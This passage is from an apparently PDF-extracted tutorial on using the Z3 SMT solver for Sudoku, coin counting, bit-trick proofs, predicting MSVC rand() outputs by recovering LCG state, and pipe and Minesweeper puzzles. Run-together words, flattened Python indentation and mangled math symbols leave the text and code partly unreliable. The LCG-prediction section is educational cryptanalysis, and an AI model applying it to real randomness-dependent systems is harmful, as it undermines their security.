# using Python list comprehension, construct array of arrays of BitVec instances:
cells=[[Int('cell%d%d' % (r, c)) for c in range(9)] for r in range(9)]
# http://www.norvig.com/sudoku.html
# http://www.mirror.co.uk/news/weird-news/worlds-hardest-sudoku-can-you-242294
puzzle="..53.....8......2..7..1.5..4....53...1..7...6..32...8..6.5....9..4....3......97.."
# process text line:
current_column=0
current_row=0
for i in puzzle:
if i!='.':
s.add(cells[current_row][current_column]==int(i))
current_column=current_column+1
if current_column==9:
current_column=0
current_row=current_row+1
# this is important, because otherwise, Z3 will report correct solutions with too big and/or negative numbers in
cells
19http://www.mirror.co.uk/news/weird-news/worlds-hardest-sudoku-can-you-242294
12
for r in range(9):
for c in range(9):
s.add(cells[r][c]>=1)
s.add(cells[r][c]<=9)
# for all 9 rows
for r in range(9):
s.add(Distinct(cells[r][0],
cells[r][1],
cells[r][2],
cells[r][3],
cells[r][4],
cells[r][5],
cells[r][6],
cells[r][7],
cells[r][8]))
# for all 9 columns
for c in range(9):
s.add(Distinct(cells[0][c],
cells[1][c],
cells[2][c],
cells[3][c],
cells[4][c],
cells[5][c],
cells[6][c],
cells[7][c],
cells[8][c]))
# enumerate all 9 squares
for r in range(0, 9, 3):
for c in range(0, 9, 3):
# add constraints for each 3*3 square:
s.add(Distinct(cells[r+0][c+0],
cells[r+0][c+1],
cells[r+0][c+2],
cells[r+1][c+0],
cells[r+1][c+1],
cells[r+1][c+2],
cells[r+2][c+0],
cells[r+2][c+1],
cells[r+2][c+2]))
#print s.check()
s.check()
#print s.model()
m=s.model()
for r in range(9):
for c in range(9):
sys.stdout.write (str(m[cells[r][c]])+" ")
print ""
(https://github.com/dennis714/SAT_SMT_article/blob/master/SMT/sudoku2.py )
% time python sudoku2.py
1 4 5 3 2 7 6 9 8
8 3 9 6 5 4 1 2 7
6 7 2 9 1 8 5 4 3
4 9 6 1 8 5 3 7 2
2 1 8 4 7 3 9 5 6
7 5 3 2 9 6 4 8 1
3 6 7 5 4 2 8 1 9
9 8 4 7 6 1 2 3 5
5 2 1 8 3 9 7 6 4
real 0m0.382s
user 0m0.346s
sys 0m0.036s
That’smuchfaster.
13
5.5.3 Conclusion
SMT-solversaresohelpful, isthatourSudokusolverhasnothingelse, wehavejustdefinedrelationships
betweenvariables(cells).
5.5.4 Homework
Asitseems,trueSudokupuzzleistheonewhichhasonlyonesolution. ThepieceofcodeI’veincludedhere
showsonlythefirstone. Usingthemethoddescribedearlier( 5.6,alsocalled“modelcounting”),trytofind
moresolutions,orprovethatthesolutionyouhavejustfoundistheonlyonepossible.
5.5.5 Further reading
http://www.norvig.com/sudoku.html
5.5.6 Sudoku as a SATproblem
It’salsopossibletorepresendSudokupuzzleasahuge CNFequationanduse SAT-solvertofindsolution,but
it’sjusttrickier.
Somearticlesaboutit: BuildingaSudokuSolverwithSAT20,TjarkWeber, ASAT-basedSudokuSolver21,
InesLynce,JoelOuaknine, SudokuasaSATProblem22,GihwonKwon,HimanshuJain, OptimizedCNFEncoding
forSudokuPuzzles23.
SMT-solvercanalsouse SAT-solverinitscore,soitdoesallmundanetranslatingwork. Asa“compiler”,
itmaynotdothisinthemostefficientway,though.
5.6 Solving Problem Euler 31: “Coin sums”
(Thistextwasfirstpublishedinmyblog24at10-May-2013.)
InEnglandthecurrencyismadeupofpound,£,andpence,p,andthereareeightcoinsin
generalcirculation:
1p,2p,5p,10p,20p,50p,£1(100p)and£2(200p).Itispossibletomake£2inthefollowing
way:
1£1+150p+220p+15p+12p+31pHowmanydifferentwayscan£2bemadeusing
anynumberofcoins?
(ProblemEuler31—Coinsums )
UsingZ3forsolvingthisisoverkill,andalsoslow,butnevertheless,itworks,showingallpossiblesolutions
aswell. Thepieceofcodeforblockingalreadyfoundsolutionandsearchfornext, andthus, countingall
solutions,wastakenfromStackOverflowanswer25. Thisisalsocalled“modelcounting”. Constraintslike
“a>=0”mustbepresent,becauseZ3solverwillfindsolutionswithnegativenumbers.
#!/usr/bin/python
from z3 import *
a,b,c,d,e,f,g,h = Ints('a b c d e f g h')
s = Solver()
s.add(1*a + 2*b + 5*c + 10*d + 20*e + 50*f + 100*g + 200*h == 200,
a>=0, b>=0, c>=0, d>=0, e>=0, f>=0, g>=0, h>=0)
result=[]
20http://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-005-elements-of-software-construction-fall-2011/
assignments/MIT6_005F11_ps4.pdf
21https://www.lri.fr/~conchon/mpri/weber.pdf
22http://sat.inesc-id.pt/~ines/publications/aimath06.pdf
23http://www.cs.cmu.edu/~hjain/papers/sudoku-as-SAT.pdf
24http://dennisyurichev.blogspot.de/2013/05/in-england-currency-is-made-up-of-pound.html
25http://stackoverflow.com/questions/11867611/z3py-checking-all-solutions-for-equation , another question: http://
stackoverflow.com/questions/13395391/z3-finding-all-satisfying-models
14
while True:
if s.check() == sat:
m = s.model()
print m
result.append(m)
# Create a new constraint the blocks the current model
block = []
for d in m:
# d is a declaration
if d.arity() > 0:
raise Z3Exception("uninterpreted functions are not suppported")
# create a constant from declaration
c=d()
#print c, m[d]
if is_array(c) or c.sort().kind() == Z3_UNINTERPRETED_SORT:
raise Z3Exception("arrays and uninterpreted sorts are not supported")
block.append(c != m[d])
#print "new constraint:",block
s.add(Or(block))
else:
print len(result)
break
Worksveryslow,andthisiswhatitproduces:
[h = 0, g = 0, f = 0, e = 0, d = 0, c = 0, b = 0, a = 200]
[f = 1, b = 5, a = 0, d = 1, g = 1, h = 0, c = 2, e = 1]
[f = 0, b = 1, a = 153, d = 0, g = 0, h = 0, c = 1, e = 2]
...
[f = 0, b = 31, a = 33, d = 2, g = 0, h = 0, c = 17, e = 0]
[f = 0, b = 30, a = 35, d = 2, g = 0, h = 0, c = 17, e = 0]
[f = 0, b = 5, a = 50, d = 2, g = 0, h = 0, c = 24, e = 0]
73682resultsintotal.
5.7 Using Z3 theorem prover to prove equivalence of some weird alternative to
XOR operation
(ThetestwasfirstpublishedinmyblogatApril2015: http://blog.yurichev.com/node/86 ).
Thereisa“AHacker’sAssistant”program26(Aha!)writtenbyHenryWarren,whoisalsotheauthorofthe
great“Hacker’sDelight”book.
TheAha!programisessentially superoptimizer27,whichblindlybrute-forcealistofsomegenericRISC
CPUinstructionstoachieveshortestpossible(andjumplessorbranch-free)CPUcodesequencefordesired
operation. Forexample, Aha!canfindjumplessversionofabs()functioneasily.
Compilerdevelopersusesuperoptimizationtofindshortestpossible(and/orjumpless)code,butItriedto
dootherwise—tofindlongestcodeforsomeprimitiveoperation. Itried Aha!tofindequivalentofbasicXOR
operationwithoutusageoftheactualXORinstruction,andthemostbizarreexample Aha!gaveis:
Found a 4-operation program:
add r1,ry,rx
and r2,ry,rx
mul r3,r2,-2
add r4,r3,r1
Expr: (((y & x)*-2) + (y + x))
And it’s hard to say, why/where we can use it, maybe for obfuscation, I’m not sure. I would call this
suboptimization (asopposedto superoptimization ). Ormaybe superdeoptimization .
But my another question was also, is it possible to prove that this is correct formula at all? The Aha!
checkingsomeintput/outputvaluesagainstXORoperation,butofcourse,notallthepossiblevalues. Itis
32-bitcode,soitmaytakeverylongtimetotryallpossible32-bitinputstotestit.
WecantryZ3theoremproverforthejob. It’scalled prover,afterall.
SoIwrotethis:
#!/usr/bin/python
from z3 import *
x = BitVec('x', 32)
26http://www.hackersdelight.org/
27http://en.wikipedia.org/wiki/Superoptimization
15
y = BitVec('y', 32)
output = BitVec('output', 32)
s = Solver()
s.add(x^y==output)
s.add(((y & x)*0xFFFFFFFE) + (y + x)!=output)
print s.check()
InplainEnglishlanguage,thismeans“arethereanycasefor xandywhere xydoesn’tequalsto ((y&x)
 2) + ( y+x)?” ...andZ3prints“unsat”,meaning,itcan’tfindanycounterexampletotheequation. Sothis
Aha!resultisprovedtobeworkingjustlikeXORoperation.
Oh,Ialsotriedtoextendtheformulato64bit:
#!/usr/bin/python
from z3 import *
x = BitVec('x', 64)
y = BitVec('y', 64)
output = BitVec('output', 64)
s = Solver()
s.add(x^y==output)
s.add(((y & x)*0xFFFFFFFE) + (y + x)!=output)
print s.check()
Nope,nowitsays“sat”,meaning,Z3foundatleastonecounterexample. Oops,it’sbecauseIforgotto
extend-2numberto64-bitvalue:
#!/usr/bin/python
from z3 import *
x = BitVec('x', 64)
y = BitVec('y', 64)
output = BitVec('output', 64)
s = Solver()
s.add(x^y==output)
s.add(((y & x)*0xFFFFFFFFFFFFFFFE) + (y + x)!=output)
print s.check()
Nowitsays“unsat”,sotheformulagivenby Aha!worksfor64-bitcodeaswell.
5.7.1 In SMT-LIB form
Nowwecanrephraseourexpressiontomoresuitableform: (x+y ((x&y)<<1)). ItalsoworkswellinZ3Py:
#!/usr/bin/python
from z3 import *
x = BitVec('x', 64)
y = BitVec('y', 64)
output = BitVec('output', 64)
s = Solver()
s.add(x^y==output)
s.add((x + y - ((x & y)<<1)) != output)
print s.check()
HereishowtodefineitinSMT-LIBway:
(declare-const x (_ BitVec 64))
(declare-const y (_ BitVec 64))
(assert
(not
(=
(bvsub
(bvadd x y)
(bvshl (bvand x y) (_ bv1 64)))
(bvxor x y)
)
)
)
(check-sat)
16
5.7.2 Using universal quantifier
Z3supportsuniversalquantifier exists,whichistrueifatleastonesetofvariablessatistfiedunderlying
condition:
(declare-const x (_ BitVec 64))
(declare-const y (_ BitVec 64))
(assert
(exists ((x (_ BitVec 64)) (y (_ BitVec 64)))
(not (=
(bvsub
(bvadd x y)
(bvshl (bvand x y) (_ bv1 64))
)
(bvxor x y)
))
)
)
(check-sat)
Itreturns“unsat”,meaning,Z3couldn’tfindanycounterexampleoftheequation,i.e.,it’snotexist.
Thisisalsoknownas 9inmathematicallogiclingo.
Z3alsosupportsuniversalquantifier forall, whichistrueiftheequationistrueforallpossiblevalues.
SowecanrewriteourSMT-LIBexampleas:
(declare-const x (_ BitVec 64))
(declare-const y (_ BitVec 64))
(assert
(forall ((x (_ BitVec 64)) (y (_ BitVec 64)))
(=
(bvsub
(bvadd x y)
(bvshl (bvand x y) (_ bv1 64))
)
(bvxor x y)
)
)
)
(check-sat)
Itreturns“sat”,meaning,theequationiscorrectforallpossible64-bit xand yvalues,likethemallwere
checked.
Mathematicallyspeaking: 8n2N(xy= (x+y ((x&y)<<1)))28
5.7.3 How the expression works
Firstofall,binaryadditioncanbeviewedasbinaryXORingwithcarrying( 11.2). Hereisanexample: let’s
add2(10b)and2(10b). XORingthesetwovaluesresulting0,butthereisacarrygeneratedduringaddition
oftwosecondbits.Thatcarrybitispropagatedfurtherandsettlesattheplaceofthe3rdbit:100b.4(100b)
ishenceafinalresultofaddition.
Ifthecarrybitsarenotgeneratedduringaddition,theadditionoperationismerelyXORing. Forexample,
let’sadd1(1b)and2(10b). 1 + 2equalsto3,but 12isalso3.
If the addition is XORing plus carry generation and application, we should eliminate effect of carrying
somehowhere. Thefirstpartoftheexpression( x+y)isaddition,thesecond( (x&y)<<1)isjustcalculation
ofeverycarrybitwhichwasusedduringaddition.Iftosubtractcarrybitsfromtheresultofaddition,theonly
XOReffectisleftthen.
It’shardtosayhowZ3provesthis:maybeitjustsimplifiestheequationdowntosingleXORusingsimple
booleanalgebrarewritingrules?
5.8 Dietz’s formula
Oneoftheimpressiveexamplesof Aha!workisfindingofDietz’sformula29,whichisthecodeofcomputing
averagenumberoftwonumberswithoutoverflow(whichisimportantifyouwanttofindaveragenumberof
288meansequationmustbetrueforallpossiblevalues ,whicharechoosenfromnaturalnumbers( N).
29http://aggregate.org/MAGIC/#Average%20of%20Integers
17
numberslike0xFFFFFF00andsoon,using32-bitregisters).
Takingthisininput:
int userfun(int x, int y) { // To find Dietz's formula for
// the floor-average of two
// unsigned integers.
return ((unsigned long long)x + (unsigned long long)y) >> 1;
}
...theAha!givesthis:
Found a 4-operation program:
and r1,ry,rx
xor r2,ry,rx
shrs r3,r2,1
add r4,r3,r1
Expr: (((y ^ x) >>s 1) + (y & x))
Anditworkscorrectly30. Buthowtoproveit?
WewillplaceDietz’sformulaontheleftsideofequationand x+y/2(orx+y >> 1)ontherightside:
8n20::264 1:(x&y) + (xy)>>1 =x+y >> 1
Oneimportantthingisthatwecan’toperateon64-bitvaluesonrightside,becauseresultwilloverflow.
Sowewillzeroextendinputsonrightsideby1bit(inotherwords,wewilljust1zerobitbeforeeachvalue).
TheresultofDietz’sformulawillalsobeextendedby1bit. Hence,bothsidesoftheequationwillhavea
widthof65bits:
(declare-const x (_ BitVec 64))
(declare-const y (_ BitVec 64))
(assert
(forall ((x (_ BitVec 64)) (y (_ BitVec 64)))
(=
((_ zero_extend 1)
(bvadd
(bvand x y)
(bvlshr (bvxor x y) (_ bv1 64))
)
)
(bvlshr
(bvadd ((_ zero_extend 1) x) ((_ zero_extend 1) y))
(_ bv1 65)
)
)
)
)
(check-sat)
Z3says“sat”.
65bitsareenough,becausetheresultofadditionoftwobiggest64-bitvalueshaswidthof65bits:
0xFF...FF + 0xFF...FF = 0x1FF...FE .
AsinpreviousexampleaboutXORequivalent, (not (= ... )) and existscanalsobeusedhereinstead
offorall.
5.9 Cracking LCGwith Z3
(ThistextisfirstappearedinmybloginJune2015at http://yurichev.com/blog/modulo/ .)
Therearewell-knownweaknessesof LCG31,butlet’ssee,ifitwouldbepossibletocrackitstraightfor-
wardly,withoutanyspecialknowledge. WewilldefineallrelationsbetweenLCGstatesintermsofZ3. Here
isatestprogam:
30Forthosewhointerestinghowitworks,itsmechanicsiscloselyrelatedtotheweirdXORalternativewejustsaw.That’swhyIplaced
thesetwopiecesoftextoneafteranother.
31http://en.wikipedia.org/wiki/Linear_congruential_generator#Advantages_and_disadvantages_of_LCGs , http:
//www.reteam.org/papers/e59.pdf , http://stackoverflow.com/questions/8569113/why-1103515245-is-used-in-rand/
8574774#8574774
18
#include <stdlib.h>
#include <stdio.h>
#include <time.h>
int main()
{
int i;
srand(time(NULL));
for (i=0; i<10; i++)
printf ("%d\n", rand()%100);
};
Itisprinting10pseudorandomnumbersin0..99range:
37
29
74
95
98
40
23
58
61
17
Let’ssayweareobservingonly8ofthesenumbers(from29to61)andweneedtopredictnextone(17)
and/orpreviousone(37).
TheprogramiscompiledusingMSVC2013(IchooseitbecauseitsLCGissimplerthanthatinGlib):
.text:0040112E rand proc near
.text:0040112E call __getptd
.text:00401133 imul ecx, [eax+0x14], 214013
.text:0040113A add ecx, 2531011
.text:00401140 mov [eax+14h], ecx
.text:00401143 shr ecx, 16
.text:00401146 and ecx, 7FFFh
.text:0040114C mov eax, ecx
.text:0040114E retn
.text:0040114E rand endp
Let’sdefineLCGinZ3Py:
#!/usr/bin/python
from z3 import *
output_prev = BitVec('output_prev', 32)
state1 = BitVec('state1', 32)
state2 = BitVec('state2', 32)
state3 = BitVec('state3', 32)
state4 = BitVec('state4', 32)
state5 = BitVec('state5', 32)
state6 = BitVec('state6', 32)
state7 = BitVec('state7', 32)
state8 = BitVec('state8', 32)
state9 = BitVec('state9', 32)
state10 = BitVec('state10', 32)
output_next = BitVec('output_next', 32)
s = Solver()
s.add(state2 == state1*214013+2531011)
s.add(state3 == state2*214013+2531011)
s.add(state4 == state3*214013+2531011)
s.add(state5 == state4*214013+2531011)
s.add(state6 == state5*214013+2531011)
s.add(state7 == state6*214013+2531011)
s.add(state8 == state7*214013+2531011)
s.add(state9 == state8*214013+2531011)
s.add(state10 == state9*214013+2531011)
s.add(output_prev==URem((state1>>16)&0x7FFF,100))
s.add(URem((state2>>16)&0x7FFF,100)==29)
s.add(URem((state3>>16)&0x7FFF,100)==74)
19
s.add(URem((state4>>16)&0x7FFF,100)==95)
s.add(URem((state5>>16)&0x7FFF,100)==98)
s.add(URem((state6>>16)&0x7FFF,100)==40)
s.add(URem((state7>>16)&0x7FFF,100)==23)
s.add(URem((state8>>16)&0x7FFF,100)==58)
s.add(URem((state9>>16)&0x7FFF,100)==61)
s.add(output_next==URem((state10>>16)&0x7FFF,100))
print(s.check())
print(s.model())
URemstatesforunsignedremainder . Itworksforsometimeandgaveuscorrectresult!
sat
[state3 = 2276903645,
state4 = 1467740716,
state5 = 3163191359,
state7 = 4108542129,
state8 = 2839445680,
state2 = 998088354,
state6 = 4214551046,
state1 = 1791599627,
state9 = 548002995,
output_next = 17,
output_prev = 37,
state10 = 1390515370]
Iadded 10statestobesureresultwillbecorrect. Itmaybenotincaseofsmallersetofinformation.
That is the reason why LCGis not suitable for any security-related task. This is why cryptographically
secure pseudorandom number generators exist: they are designed to be protected against such simple
attack. Well,atleastif NSA32don’tgetinvolved33.
Security tokens like “RSA SecurID” can be viewed just as CPRNG34with a secret seed. It shows new
pseudorandomnumbereachminute,andtheservercanpredictit,becauseitknowstheseed. Imagineif
suchtokenwouldimplement LCG—itwouldbemucheasiertobreak!
5.10 Solving pipe puzzle using Z3 SMT-solver
“Pipepuzzle”isapopularpuzzle(justgoogle“pipepuzzle”andlookatimages).
Thisishowshuffledpuzzlelookslike:
Figure2:Shuffledpuzzle
...andsolved:
32NationalSecurityAgency
33https://en.wikipedia.org/wiki/Dual_EC_DRBG
34CryptographicallySecurePseudorandomNumberGenerator
20
Figure3:Solvedpuzzle
Let’strytofindawaytosolveit.
5.10.1 Generation
First,weneedtogenerateit. Hereismyquickideaonit. Take8*16arrayofcells. Eachcellmaycontain
sometypeofblock. Therearejointsbetweencells:
vjoints[...,0]
vjoints[...,1]
vjoints[...,2]
vjoints[...,3]
vjoints[...,4]
vjoints[...,5]
vjoints[...,6]
vjoints[...,7]
vjoints[...,8]
vjoints[...,9]
vjoints[...,10]
vjoints[...,11]
vjoints[...,12]
vjoints[...,13]
vjoints[...,14]
vjoints[...,15]
hjoints[7,...]hjoints[6,...]hjoints[5,...]hjoints[4,...]hjoints[3,...]hjoints[2,...]hjoints[1,...]hjoints[0,...]
Bluelinesarehorizontaljoints,redlinesareverticaljoints. Wejustseteachjointto0/false(absent)or
1/true(present),randomly.
Onceset,it’snoweasytofindtypeforeachcell. Thereare:
jointsourinternalname anglesymbol
0type0 0◦(space)
2type2a 0◦
2type2a 90◦
2type2b 0◦
2type2b 90◦
2type2b 180◦
2type2b 270◦
21
3type3 0◦
3type3 90◦
3type3 180◦
3type3 270◦
4type4 0◦
Danglingjointscanbepresetatafirststage(i.e.,cellwithonlyonejoint),buttheyareremovedrecursively,
thesecellsaretransformingintoemptycells.Hence,attheend,allcellshasatleasttwojoints,andthewhole
plumbingsystemhasnoconnectionswithouterworld—Ihopethiswouldmakethingsclearer.
TheCsourcecodeofgeneratorishere: https://github.com/dennis714/SAT_SMT_article/tree/master/
SMT/pipe/generator . Allhorizontaljointsarestoredintheglobalarray hjoints[]andverticalin vjoints[].
TheCprogramgeneratesANSI-coloredoutputlikeithasbeenshowedabove( 5.10,5.10)plusanarrayof
types,withnoangleinformationabouteachcell:
[
["0", "0", "2b", "3", "2a", "2a", "2a", "3", "3", "2a", "3", "2b", "2b", "2b", "0", "0"],
["2b", "2b", "3", "2b", "0", "0", "2b", "3", "3", "3", "3", "3", "4", "2b", "0", "0"],
["3", "4", "2b", "0", "0", "0", "3", "2b", "2b", "4", "2b", "3", "4", "2b", "2b", "2b"],
["2b", "4", "3", "2a", "3", "3", "3", "2b", "2b", "3", "3", "3", "2a", "2b", "4", "3"],
["0", "2b", "3", "2b", "3", "4", "2b", "3", "3", "2b", "3", "3", "3", "0", "2a", "2a"],
["0", "0", "2b", "2b", "0", "3", "3", "4", "3", "4", "3", "3", "3", "2b", "3", "3"],
["0", "2b", "3", "2b", "0", "3", "3", "4", "3", "4", "4", "3", "0", "3", "4", "3"],
["0", "2b", "3", "3", "2a", "3", "2b", "2b", "3", "3", "3", "3", "2a", "3", "3", "2b"],
]
5.10.2 Solving
Firstofall,wewouldthinkabout8*16arrayofcells,whereeachhasfourbits: “T”(top),“B”(bottom),“L”
(left),“R”(right). Eachbitrepresentshalfofjoint.
[...,0]
[...,1]
[...,2]
[...,3]
[...,4]
[...,5]
[...,6]
[...,7]
[...,8]
[...,9]
[...,10]
[...,11]
[...,12]
[...,13]
[...,14]
[...,15]
[7,...]T
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLR[6,...]T
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLR[5,...]T
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLR[4,...]T
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLR[3,...]T
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLR[2,...]T
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLR[1,...]T
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLR[0,...]T
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLRT
BLR
Nowwedefinearraysofeachoffourhalf-joints+angleinformation:
HEIGHT=8
WIDTH=16
# if T/B/R/L is Bool instead of Int, Z3 solver will work faster
T=[[Bool('cell_%d_%d_top' % (r, c)) for c in range(WIDTH)] for r in range(HEIGHT)]
B=[[Bool('cell_%d_%d_bottom' % (r, c)) for c in range(WIDTH)] for r in range(HEIGHT)]
R=[[Bool('cell_%d_%d_right' % (r, c)) for c in range(WIDTH)] for r in range(HEIGHT)]
L=[[Bool('cell_%d_%d_left' % (r, c)) for c in range(WIDTH)] for r in range(HEIGHT)]
A=[[Int('cell_%d_%d_angle' % (r, c)) for c in range(WIDTH)] for r in range(HEIGHT)]
Weknowthatifeachofhalf-jointsispresent,correspondinghalf-jointmustbealsopresent,andviceversa.
Wedefinethisusingtheseconstraints:
22
# shorthand variables for True and False:
t=True
f=False
# "top" of each cell must be equal to "bottom" of the cell above
# "bottom" of each cell must be equal to "top" of the cell below
# "left" of each cell must be equal to "right" of the cell at left
# "right" of each cell must be equal to "left" of the cell at right
for r in range(HEIGHT):
for c in range(WIDTH):
if r!=0:
s.add(T[r][c]==B[r-1][c])
if r!=HEIGHT-1:
s.add(B[r][c]==T[r+1][c])
if c!=0:
s.add(L[r][c]==R[r][c-1])
if c!=WIDTH-1:
s.add(R[r][c]==L[r][c+1])
# "left" of each cell of first column shouldn't have any connection
# so is "right" of each cell of the last column
for r in range(HEIGHT):
s.add(L[r][0]==f)
s.add(R[r][WIDTH-1]==f)
# "top" of each cell of the first row shouldn't have any connection
# so is "bottom" of each cell of the last row
for c in range(WIDTH):
s.add(T[0][c]==f)
s.add(B[HEIGHT-1][c]==f)
Nowwe’llenumerateallcellsintheinitialarray( 5.10.1).Firsttwocellsareemptythere.Andthethirdone
hastype“2b”. Thisis“ ”anditcanbeorientedin4possibleways. Andifithasangle0◦,bottomandright
half-jointsarepresent,othersareabsent. Ifithasangle90◦,itlookslike“ ”,andbottomandlefthalf-joints
arepresent,othersareabsent.
InplainEnglish: “ifcellofthistypehasangle0◦,thesehalf-jointsmustbepresent ORifithasangle90◦,
thesehalf-jointsmustbepresent, OR,etc,etc.”
Likewise,wedefinealltheserulesforalltypesandallpossibleangles:
for r in range(HEIGHT):
for c in range(WIDTH):
ty=cells_type[r][c]
if ty=="0":
s.add(A[r][c]==f)
s.add(T[r][c]==f, B[r][c]==f, L[r][c]==f, R[r][c]==f)
if ty=="2a":
s.add(Or(And(A[r][c]==0, L[r][c]==f, R[r][c]==f, T[r][c]==t, B[r][c]==t), #
And(A[r][c]==90, L[r][c]==t, R[r][c]==t, T[r][c]==f, B[r][c]==f))) #
if ty=="2b":
s.add(Or(And(A[r][c]==0, L[r][c]==f, R[r][c]==t, T[r][c]==f, B[r][c]==t), #
And(A[r][c]==90, L[r][c]==t, R[r][c]==f, T[r][c]==f, B[r][c]==t), #
And(A[r][c]==180, L[r][c]==t, R[r][c]==f, T[r][c]==t, B[r][c]==f), #
And(A[r][c]==270, L[r][c]==f, R[r][c]==t, T[r][c]==t, B[r][c]==f))) #
if ty=="3":
s.add(Or(And(A[r][c]==0, L[r][c]==f, R[r][c]==t, T[r][c]==t, B[r][c]==t), #
And(A[r][c]==90, L[r][c]==t, R[r][c]==t, T[r][c]==f, B[r][c]==t), #
And(A[r][c]==180, L[r][c]==t, R[r][c]==f, T[r][c]==t, B[r][c]==t), #
And(A[r][c]==270, L[r][c]==t, R[r][c]==t, T[r][c]==t, B[r][c]==f))) #
if ty=="4":
s.add(A[r][c]==0)
s.add(T[r][c]==t, B[r][c]==t, L[r][c]==t, R[r][c]==t) #
Fullsourcecodeishere: https://github.com/dennis714/SAT_SMT_article/blob/master/SMT/pipe/
solver/solve_pipe_puzzle1.py .
Itproducesthisresult(printsangleforeachcelland(pseudo)graphicalrepresentation):
23
Figure4:Solverscriptoutput
Itworked 4secondsonmyoldandslowIntelAtomN4551.66GHz. Isitfast? Idon’tknow,butagain,
whatisreallycool, wedonotknowaboutanymathematicalbackgroundofallthis, wejustdefinedcells,
(half-)jointsanddefinedrelationsbetweenthem.
Nowthenextquestionis, howmanysolutionsarepossible? Usingmethoddescribedearlier( 5.6), I’ve
alteredsolverscript35andsolversaidtwosolutionsarepossible.
Let’scomparethesetwosolutionsusinggvimdiff:
Figure5:gvimdiffoutput(pardonmyredcursoratleftpaneatleft-bottomcorner)
4cellsinthemiddlecanbeorientateddifferently. Perhaps,otherpuzzlesmayproducedifferentresults.
P.S.Half-jointisdefinedasbooleantype. Butinfact,thefirstversionofthesolverhasbeenwrittenusing
integertypeforhalf-joints, and0wasusedforFalseand1forTrue. IdiditsobecauseIwantedtomake
sourcecodetidierandnarrowerwithoutusinglongwordslike“False”and“True”. Anditworked,butslower.
Perhaps,Z3handlesbooleandatatypesfaster? Better? Anyway,Iwritingthistonotethatintegertypecan
alsobeusedinsteadofboolean,ifneeded.
35https://github.com/dennis714/SAT_SMT_article/blob/master/SMT/pipe/solver/solve_pipe_puzzle2.py
24
5.11 Cracking Minesweeper with Z3 SMT solver
ForthosewhoarenotverygoodatplayingMinesweeper(likeme),it’spossibletopredictbombs’placement
withouttouchingdebugger.
HereisaclickedsomewhereandIseerevealedemptycellsandcellswithknownnumberof“neighbours”:
Whatwehavehere,actually? Hiddencells,emptycells(wherebombsarenotpresent),andemptycells
withnumbers,whichshowshowmanybombsareplacednearby.
5.11.1 The method
Hereiswhatwecando: wewilltrytoplaceabombtoallpossiblehiddencellsandaskZ3SMTsolver,ifit
candisprovetheveryfactthatthebombcanbeplacedthere.
Take a look at this fragment. ”?” mark is for hidden cell, ”.” is for empty cell, number is a number of
neighbours.
C1C2C3
R1???
R2?3.
R3?1.
Sothereare5hiddencells.Wewillcheckeachhiddencellbyplacingabombthere.Let’sfirstpicktop/left
cell:
C1C2C3
R1*??
R2?3.
R3?1.
Thenwewilltrytosolvethefollowingsystemofequations( RrCciscellofrow randcolumn c):
•R1C2+R2C1+R2C2=1(becauseweplacedbombatR1C1)
•R2C1+R2C2+R3C1=1(becausewehave”1”atR3C2)
•R1C1+R1C2+R1C3+R2C1+R2C2+R2C3+R3C1+R3C2+R3C3=3(becausewehave”3”atR2C2)
•R1C2+R1C3+R2C2+R2C3+R3C2+R3C3=0(becausewehave”.”atR2C3)
•R2C2+R2C3+R3C2+R3C3=0(becausewehave”.”atR3C3)
As it turns out, this system of equations is satisfiable, so there could be a bomb at this cell. But this
informationisnotinterestingtous,sincewewanttofindcellswecanfreelyclickon.Andwewilltryanother
one.Andiftheequationwillbeunsatisfiable,thatwouldimplythatabombcannotbethereandwecanclick
onit.
25
5.11.2 The code
#!/usr/bin/python
known=[
"01?10001?",
"01?100011",
"011100000",
"000000000",
"111110011",
"????1001?",
"????3101?",
"?????211?",
"?????????"]
from z3 import *
import sys
WIDTH=len(known[0])
HEIGHT=len(known)
print "WIDTH=", WIDTH, "HEIGHT=", HEIGHT
def chk_bomb(row, col):
s=Solver()
cells=[[Int('cell_r=%d_c=%d' % (r,c)) for c in range(WIDTH+2)] for r in range(HEIGHT+2)]
# make border
for c in range(WIDTH+2):
s.add(cells[0][c]==0)
s.add(cells[HEIGHT+1][c]==0)
for r in range(HEIGHT+2):
s.add(cells[r][0]==0)
s.add(cells[r][WIDTH+1]==0)
for r in range(1,HEIGHT+1):
for c in range(1,WIDTH+1):
t=known[r-1][c-1]
if t in "012345678":
s.add(cells[r][c]==0)
# we need empty border so the following expression would be able to work for all possible cases:
s.add(cells[r-1][c-1] + cells[r-1][c] + cells[r-1][c+1] + cells[r][c-1] + cells[r][c+1] + cells[
r+1][c-1] + cells[r+1][c] + cells[r+1][c+1]==int(t))
# place bomb:
s.add(cells[row][col]==1)
result=str(s.check())
if result=="unsat":
print "row=%d col=%d, unsat!" % (row, col)
# enumerate all hidden cells:
for r in range(1,HEIGHT+1):
for c in range(1,WIDTH+1):
if known[r-1][c-1]=="?":
chk_bomb(r, c)
Thecodeisalmostself-explanatory. Weneedborderforthesamereason,whyConway’s”GameofLife”
implementationsalsohasborder(tomakecalculationfunctionsimpler). Wheneverweknowthatthecellis
freeofbomb,weputzerothere. Wheneverweknownumberofneighbours,weaddaconstraint,again,just
likein”GameofLife”:numberofneighboursmustbeequaltothenumberwehaveseenintheMinesweeper.
Thenweplacebombsomewhereandcheck.
Let’srun:
row=1 col=3, unsat!
row=6 col=2, unsat!
row=6 col=3, unsat!
row=7 col=4, unsat!
